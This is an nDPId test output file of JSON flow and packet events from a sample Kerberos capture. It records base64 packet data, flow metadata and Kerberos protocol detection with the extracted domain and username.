-00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337940432,"pkt":"AAgCHEeupB9ywglqCABFAACbE79AAIAGfaysEAgIrBAIyQBYwCKqXKOdyRjZGVAYAQDDTwAAKYg87lVL35oh62EWNwE864\/2bfnOQr1tnnHZbVGEslhqWgqxgOlP8fU7tCl8Q\/Pa+OiAoCN8WQQSqJd8h73HLCORGVTkV2\/0V8MyUM0yQH1SL9l7PdXJm7IP\/IVn+E9KcR0nyC\/qPtxkWFJAw4YHnIb0GQ=="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337940432,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"flow_min_l4_payload_len":359,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":359,"midstream":1,"thread_ts_msec":1549337940432,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00936{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":413,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":413,"pkt_l4_len":379,"thread_ts_msec":1549337940432,"pkt":"pB9ywglqAAgCHEeuCABFAAGPAP5AAIAGj3msEAjJrBAICMAhwAMZWxyAQJkJXFAYAQAR1wAA1H5mUL0BcI4qPWGkggFYMIIBVKADAgESooIBSwSCAUcbieRVkdOtAnzmcyqLDK9HyZo8H6AcRFkR6nkpd0sYlEbV82Qt31YdF5lIivhvCiptxoXnMPhE44z2QYycXFRvcJlMUVHmYJTlGAPASSmrxcFRtfwGd3CmxLGHH6gdXYYGgEzOmFuOyHJjprxX+WUkbubIb9DuIaCyGfu6WjSvDsJsxl8APFvUDVpwKCBx+yi4Nl7uparYkV7uyBIsOfius8LRX8aNw6uyL8Rg7Kcy+u\/AdDO7DcqqeIW4ECzaDnKuMDvhoDG1L4DC3Gyq10cUmszgrrBDkGwYBF3I07gVPaOITvdzOarlv0eTNHIPNCN07gmcrX\/ElHpPLwV7ZiI5SB1SY8Op3qesfZqAIqjOBGiyQU2+uy5qrSSffZHU9iojHh1BosRxcA7pQ15VJkC0LtUsgQyMbCX0W85YmDAFmZqe2ZivqK8="} -00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1549337940433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":1549337940433,"pkt":"AAgCHEeupB9ywglqCABFAAFEE8NAAIAGfP+sEAgIrBAIycADwCFAmQlcGVsd51AYAQDbOQAABQAMBxAAAAAcAagAAgAAANAW0BaIIgAABgA0OTE1NQADAAAAAgACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMFcXG6vjdJgxm12++czDYBAAAAAwADAAAAAAAAAAAAAAAAAAAAAAAAAAAACQYAAAAAAAChgaUwgaKgAwoBAaELBgkqhkiC9xIBAgKigY0EgYpvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8Ebfn2lEYLCMVIVfFxnfrMpLLQ5jje4X2obHkLE1mHLBb3QYmIfBpDW5VyIgGbPY54D9aSU3VouXp90Sdg8ibesBCnHqUH+HJX\/hdQ0brTNgFSTOR\/m3sdIfIuZmQkzV3dPMC5PlxnwhbW8ZWYvQE="} -00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1549337940433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1549337940433,"pkt":"pB9ywglqAAgCHEeuCABFAAEEAP9AAIAGkAOsEAjJrBAICMAhwAMZWx3nQJkKeFAYAP\/gGgAABQAOAxAAAADcAIwAAgAAANAW0BYAAAAAAQAAAAEAAQA1QlHjBkvREasEAMBPwtzSBAAAADMFcXG6vjdJgxm12++czDYBAAAACQYAAAAAAAChgYkwgYagAwoBAaJfBF1vWzBZoAMCAQWhAwIBD6JNMEugAwIBEqJEBELB6nut18jCMG03H8TJyLvCf8wWF6F7BqJ4bg85nSMTOiCmzGy+a5tNrq0VYdAt2TCIZ2p1Ys\/DpnWvcPxOp0LCSoajHgQcBAQE\/\/\/\/\/\/8AAAAAVL504MDCo+3fnXZuQhY33A=="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1549337951630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1549337951630,"pkt":"pB9ywglqAAgCHEeuCABFAAETAQ1AAIAGj+asEAjJrBAICMAjAFj9jJo6lSyMo1AYAQB4vAAAAAAA52qB5DCB4aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBvTCBuqAHAwUAQIEAEKEcMBqgAwIBAaETMBEbD3RoZXJlc2Euam9obnNvbqIMGwpIQVBQWUNSQUZUox8wHaADAgECoRYwFBsGa3JidGd0GwpIQVBQWUNSQUZUpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEXdv8Z6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} -00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} -00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1549337951631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1549337951631,"pkt":"AAgCHEeupB9ywglqCABFAAEYE9dAAIAGfResEAgIrBAIyQBYwCOVLIyj\/YybJVAYAQAREAAAAAAA7H6B6TCB5qADAgEFoQMCAR6kERgPMjAxOTAyMDUwMzM5MTBapQUCAwNKZqYDAgEZqQwbCkhBUFBZQ1JBRlSqHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSsgYsEgYgwgYUwYqEDAgETolsEWTBXMCagAwIBEqEfGx1IQVBQWUNSQUZULk9SR3RoZXJlc2Euam9obnNvbjAFoAMCARcwJqADAgEDoR8bHUhBUFBZQ1JBRlQuT1JHdGhlcmVzYS5qb2huc29uMAmhAwIBAqICBAAwCaEDAgEQogIEADAJoQMCAQ+iAgQA"} -00732{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337951631,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00879{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1549337951638,"pkt":"pB9ywglqAAgCHEeuCABFAAFjARFAAIAGj5KsEAjJrBAICMAkAFi0GLZOsNNMHlAYAQAvMAAAAAABN2qCATMwggEvoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4Wndh9xw8qUUtso0vc8TuP9R5peLYlUKrIi93QkMXsrfVII\/B8UhLSOwTSHwq5LSHP2vURJP\/YpgwEaEEAgIAgKIJBAcwBaADAQH\/pIG9MIG6oAcDBQBAgQAQoRwwGqADAgEBoRMwERsPdGhlcmVzYS5qb2huc29uogwbCkhBUFBZQ1JBRlSjHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSlERgPMjAzNzA5MTMwMjQ4MDVaphEYDzIwMzcwOTEzMDI0ODA1WqcGAgRd2\/xnqBUwEwIBEgIBEQIBFwIBGAIC\/3kCAQOpHTAbMBmgAwIBFKESBBBKT0hOU09OLVBDICAgICAg"} -00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1549337951638,"pkt":"AAgCHEeupB9ywglqCABFAADKE9xAAIAGfWCsEAgIrBAIyQBYwCSw01HStBi3iVAYAQA+gAAAtgxIRqdE2xpJueUsyACfoBkRIO2d0vdWoZTH7\/Uq\/IekfUoxUBvBS550+iWChkmhJucRdY1OlQL1WMQC8uhxGdFWaESvp\/JzESFsbwdEK2JaAYNNrn2MyR4+4w4oYIB6xP3aoFYA9y5s01X0oEa\/3ePvjWb66V7pwZZYO9bc89yozmxDtVb4zCT8SyPCYGj7ljiOz9w+sICchbsKK+VkdLL4"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337951639,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1549337951639,"pkt":"pB9ywglqAAgCHEeuCABFAABRARdAAIAGkJ6sEAjJrBAICMAlAFiRlp2kV2CH+1AYAQDPTQAAMzcwOTEzMDI0ODA1WqcGAgRd2\/xvqBIwEAIBEgIBEQIBFwIBGAIC\/3k="} -00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":120,"pkt_l4_len":86,"thread_ts_msec":1549337951639,"pkt":"AAgCHEeupB9ywglqCABFAABqE+JAAIAGfbqsEAgIrBAIyQBYwCVXYI2vkZadzVAYAQBXRgAAQS6YdBRcDlPtUTrjUB8narHoPerU+E0Jfux+IwijhqkO1zkqtUVGrf6H2Py3dE6xzPm7+U9W58\/67z4LH\/YlBX9v"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951709,"flow_last_seen":1549337951709,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1549337951709,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00750{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1549337951709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1549337951709,"pkt":"pB9ywglqAAgCHEeuCABFAAEBAR5AAIAGj+esEAjJrBAICMAmAFg7QE\/YI2nTKVAYAQALhgAAZxsOaGFwcHljcmFmdC5vcmelERgPMjAzNzA5MTMwMjQ4MDVapwYCBF3PyFqoEjAQAgESAgERAgEXAgEYAgL\/eaqBljCBk6ADAgESooGLBIGIqYCMNPGCrPeLGO9qPK8YFBfjHxUTb+emA\/ivLTUTYudncy22kbyckKCiSeisUe8yJ84rq8HDegGsl0qK5XKbjnVH8LqImnH6XpTRvHWQpRpTszA\/lJoaM6MWsPPKugansbtAh5mO54t+2+bi3wT01iiQl45hp5bjTN1UEkZf+dFCUo8Xssy7aA=="} -00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1549337951710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1549337951710,"pkt":"AAgCHEeupB9ywglqCABFAADmE+lAAIAGfTesEAgIrBAIyQBYwCYjadjdO0BQsVAYAQAYcQAA4k0pIk9VQ3WSD8DyjCP6zDplkOu688cj7B+axduw7FbTE6AYUgZjQCgBXNnQmZk8AZkKxd6trQiOV9Q21Ig4\/vSvcG7YJA68j6K63UrdpgCrN\/5os+IHfd01LLYH5NyLiu66hLUPywBQtPqISEBXxfQa4YqqDi7eMFkF+tYnKAJyaEAa5CaoA\/k+JAFpYmNuKBJA\/cZZR\/sXThwZU9vDmuS8WhtIpf+zFLSMTZjUF9FuugxEPjg+p8gxz6TuBQ=="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952265,"flow_last_seen":1549337952265,"flow_idle_time":7440000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":1,"thread_ts_msec":1549337952265,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1549337952265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1549337952265,"pkt":"pB9ywglqAAgCHEeuCABFAADxATFAAIAGj+SsEAjJrBAICMAoAFgO6N+GhTfTAFAYAQDd\/AAAZ6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbrRWKgSMBACARICARECARcCARgCAv95qoGWMIGToAMCARKigYsEgYglkZxyflQKWP\/Ais8K06SJm4BPQtT0hjtYpqxsbw8zJYoGM4sYpjZXyTJirO221HZEfk4Zw9eEBLahQpLvN\/C8eKG6Szv5sdWvrvtDno9G1S6IPzDJUqQoaMmLFbqp3TeM2kcY2MDfHhnn2YOkxOZoLnNXNaT+dUxt2+N2MukPguNeobu829zS"} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1549337952266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1549337952266,"pkt":"AAgCHEeupB9ywglqCABFAADbE\/lAAIAGfTKsEAgIrBAIyQBYwCiFN9i0DujgT1AYAQCK\/QAAiBuHmEFFmc+WsyXKuqx9Swihi4V8obVw5s2sIwUfT4tmX1K8bbM9re\/5e5wllRug+\/LlwLPFO11iuIJBpf\/1q6VzsWXZQ3Uhj6pv9Mvwu3XM\/Kg0OKnhbHwHjTwPH8AFLK9Xs6OvjCpemPsc4QD2yHfZIqmzSgyFffWrBEHUQ0oxARyRw\/cKuJ\/iV+cgVuWHP+LCTlyCV2gs4Zw\/xETck8iUuOpN6dDKbNN8Vw5JmilGwYg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1549337952267,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00886{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":368,"pkt_l4_len":334,"thread_ts_msec":1549337952267,"pkt":"pB9ywglqAAgCHEeuCABFAAFiATVAAIAGj2+sEAjJrBAICMAnAYUlT+9+CA99hlAYAQDCQwAAdUvVLNApPEvRYHXzTe8zaxz\/9SHPb\/8TWpCDGqMEAHclvciM0GOY0+pGIhzH\/f\/6jOacNFpBroqFCWgt6TZwWzHkJCgQPX52B1IK52bZg0ONYZDAO1UzroKY+wbOMCsJF8\/BbP9OSbZKzzlfun2r96DSICH7w7yEUFli3VQeP0ogbe+3tFoHFjb+05dbP\/VPGYwLelBDF4MSfNFsp+OMFLmJGy8zQTsDu6jfRxBXMbl8NmKpljCGrvpbK91ZL6OpbzC0zmaE6i4hHgj8sVok02UOBn0gMsv\/uMFl8gfFKRQNU\/cuTbNe+ET9apWENw\/dcLPR6pjmHtriptNJoQ3zVjS2Tc+IkoIqsOQ3cvktrgQFCtQLWZP3pztmcBjhot2oF4ypo07u7Pn3GnXRKfmep\/RhPO\/A8\/McJI0="} -00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337952267,"pkt":"AAgCHEeupB9ywglqCABFAAD6E\/1AAIAGfQ+sEAgIrBAIyQGFwCcID32GJU\/wuFAYAQAMIAAAMIQAAADMAgEPYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1aIGsolL+fu1BeIvW0ck8xNtulprbrU8LwWAQ+0HLcHzxYvBiLYdCRYKwhIeaZIrmfEg+Fmg6VMrCzRHOuCMx3gqqLIgnuXXvz9jtqiRlG1LxGN\/8hm6Dc5JLtY2J2bRsWOZJSU4VCKr7ax6LU"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952273,"flow_last_seen":1549337952273,"flow_idle_time":7440000,"flow_min_l4_payload_len":330,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":330,"midstream":1,"thread_ts_msec":1549337952273,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00906{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1549337952273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":384,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":384,"pkt_l4_len":350,"thread_ts_msec":1549337952273,"pkt":"pB9ywglqAAgCHEeuCABFAAFyATpAAIAGj1qsEAjJrBAICMApAYWiDvrzQ6ao6FAYAQCdKwAA2XkxbZ8llDCRRskO9gczLnFPBBStfBeg8OgSpqEBOAYdhyM5RDqy\/NVC6gFAjMdVRNF4Ud\/vkuMZvi\/C9TPqJBllB8ilyB5vY\/0m8yd5y16xkjvnwbrb\/W3CqgNY3GxQ0p18n9KBChjcbfQi2adBQLNadPsG91L4HVVYSlDxeVsaDj0AMrkXgx+K3pVveifu4IJvdTmm3dssrOx7ri4BqxH9gyHnnJM+gUu5MIG+gLCwhKX1IYuuZbwXmnO9knNSHi2TJaHys\/IKitqKHwvZMTG4i5pUecWz9NSU996q6A\/\/cM86g4TCvpD7370UyqGGHaccTUUMvb5qsoRczG++plTQXQ5YE69in6j\/JeD8IrT\/3QjjRWw+cBkDPh5zGLRzdI7hQfeBq0OXmrV0OXPvzg6Pl4TznRF\/D32Q4zoFws9t5i+mUoUZd\/0N"} -00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1549337952274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337952274,"pkt":"AAgCHEeupB9ywglqCABFAAD6FAFAAIAGfQusEAgIrBAIyQGFwClDpqjoog78PVAYAQACfgAAMIQAAADMAgETYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1lU8qvBSW6OfUooizc58b3UUWb1Dc9+q1BnNlk6M5gNl0OBLUYfNGeTN7jVmkr5YZr3HGFOATkbw9DVEo286mQ0yhq4w+ZVjlShGexAg6l9M9U7cWsZU11Tj+uS9vWEh6ZGrVD7TgBU6qOlGAU"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952280,"flow_last_seen":1549337952280,"flow_idle_time":7440000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":1,"thread_ts_msec":1549337952280,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1549337952280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1549337952280,"pkt":"pB9ywglqAAgCHEeuCABFAADxAURAAIAGj9GsEAjJrBAICMArAFh+ue0Nm8k31FAYAQCDOwAAZ6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbhyIagSMBACARICARECARcCARgCAv95qoGWMIGToAMCARKigYsEgYjkLV5w61M4dBZf0U0Cc\/K54wTCl69GxhAdEJKI0gkw0Ve5ZSvbl+6jcyFmUgFhA4RyBx9pGsk\/XqrLuUXPEHyz9XOfuzdWYBvPp5yv4UFPIJKI5TMk\/2fkioL\/XfCG7Jr8xEeBwNw3Qk0PtCp3\/DDaU5\/NbtOzNRQiyiFTx75LpVnwmoKHd6R7"} 